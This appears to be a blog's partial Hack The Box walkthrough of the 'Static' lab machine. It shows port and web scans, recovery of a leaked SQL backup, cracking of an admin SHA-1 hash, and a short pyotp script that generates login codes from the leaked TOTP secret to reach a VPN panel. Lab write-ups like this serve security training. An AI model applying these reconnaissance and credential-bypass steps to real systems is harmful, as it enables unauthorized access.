Static

Hack The Box Machines No Comments
$ nmap -Pn 10.129.128.160
PORT     STATE SERVICE
22/tcp   open  ssh
2222/tcp open  EtherNetIP-1
8080/tcp open  http-proxy
$ sudo nmap -p 2222 -T4 -A 10.129.128.160
PORT     STATE SERVICE VERSION
2222/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:a4:5c:e3:a9:05:54:b1:1c:ae:1b:b7:61:ac:76:d6 (RSA)
|   256 c9:58:53:93:b3:90:9e:a0:08:aa:48:be:5e:c4:0a:94 (ECDSA)
|_  256 c7:07:2b:07:43:4f:ab:c8:da:57:7f:ea:b5:50:21:bd (ED25519)
$ sudo nmap -p 8080 -T4 -A 10.129.128.160
8080/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/vpn/ /.ftp_uploads/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
$ nikto -h http://10.129.128.160:8080
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server banner has changed from 'Apache/2.4.38 (Debian)' to 'Apache/2.4.29 (Ubuntu)' which may suggest a WAF, load balancer or proxy is in place
+ Cookie PHPSESSID created without the httponly flag
+ Entry '/vpn/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ OSVDB-3268: /.ftp_uploads/: Directory indexing found.
+ Entry '/.ftp_uploads/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
$ dirb 10.129.128.160:8080
---- Scanning URL: http://10.129.128.160:8080/ ----
+ http://10.129.128.160:8080/index.php (CODE:200|SIZE:0)                                                                                                         
+ http://10.129.128.160:8080/robots.txt (CODE:200|SIZE:55)                                                                                                       
+ http://10.129.128.160:8080/server-status (CODE:403|SIZE:281)  
$ echo 10.129.129.126 static.htb | sudo tee -a /etc/hosts

OWASP ZAP
http://10.129.128.160:8080/vpn/login.php
curl -i -s -k -X  'POST'  \
 -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0'  -H 'Pragma: no-cache'  -H 'Cache-Control: no-cache'  -H 'Content-Type: application/x-www-form-urlencoded'  -H 'Content-Length: 38'  -H 'Referer: http://10.129.128.160:8080/vpn/login.php'  -H 'Cookie: PHPSESSID=9agp3nerpthlsbl1rceh72or17'  -H ''  \
--data-binary $'username=ZAP&password=ZAP&submit=Login' \
'http://10.129.128.160:8080/vpn/login.php'

http://10.129.128.160:8080/.ftp_uploads/
http://10.129.128.160:8080/robots.txt

User-agent: *
Disallow: /vpn/
Disallow: /.ftp_uploads/

kali@kali:~/0.htb/machines/Static$ file db.sql.gz 
db.sql.gz: gzip compressed data, was "db.sql", last modified: Thu Jun 18 15:43:42 2020, from Unix, original size modulo 2^32 355
kali@kali:~/0.htb/machines/Static$ 

kali@kali:~/0.htb/machines/Static/$ dos2unix -f db.sql.gz
kali@kali:~/0.htb/machines/Static/$ gunzip db.sql.gz

kali@kali:~/0.htb/machines/Static/$ cat db.sql 
CREATE DATABASE static;
USE static;
CREATE TABLE users ( id smallint unsigned not null auto_increment, username varchar(20) not null, password varchar(40) not null, totp varchar(16) not null, primary key (id) ); 
INSERT INTO users ( id, username, password, totp ) VALUES ( null, 'admin', 'd033e22ae348aeb5660fc2140aec35850c4da997', 'orxxi4c7orxwwzlo' );
cyberchef
d033e22ae348aeb5660fc2140aec35850c4da997
Hash length: 40
Byte length: 20
Bit length:  160

Based on the length, this hash could have been generated by one of the following hashing functions:
SHA-1
SHA-0
FSB-160
HAS-160
HAVAL-160
RIPEMD-160
Tiger-160

kali@kali:~/0.htb/machines/Static$ hashid d033e22ae348aeb5660fc2140aec35850c4da997
Analyzing 'd033e22ae348aeb5660fc2140aec35850c4da997'
[+] SHA-1 
[+] Double SHA-1 
[+] RIPEMD-160 
[+] Haval-160 
[+] Tiger-160 
[+] HAS-160 
[+] LinkedIn 
[+] Skein-256(160) 
[+] Skein-512(160) 
kali@kali:~/0.htb/machines/Static$ 

kali@kali:~/0.htb/machines/Static$ hash-identifier 
HASH: d033e22ae348aeb5660fc2140aec35850c4da997

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

decode: admin

kali@kali:~/0.htb/machines/Static/$ echo -n admin | sha1deep
d033e22ae348aeb5660fc2140aec35850c4da997
kali@kali:~/0.htb/machines/Static/$ echo -n admin | sha1sum
d033e22ae348aeb5660fc2140aec35850c4da997  -
kali@kali:~/0.htb/machines/Static/$ 
http://10.129.129.90:8080/vpn/login.php
admin / admin
totp.py
 import pyotp
 totp = pyotp.TOTP('orxxi4c7orxwwzlo')
 print(totp.now())

http://10.129.129.90:8080/vpn/panel.php
Static Inc.
Internal IT Support portal

Common Name = 		Generate

Server	Address	Status
pub	172.17.0.10	Offline
web	172.20.0.10	Online
db	172.20.0.11	Online
vpn	172.30.0.1	Online
pki	192.168.254.3	Online

five ovpn files generated.

Leave a Reply

Your email address will not be published. Required fields are marked *

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation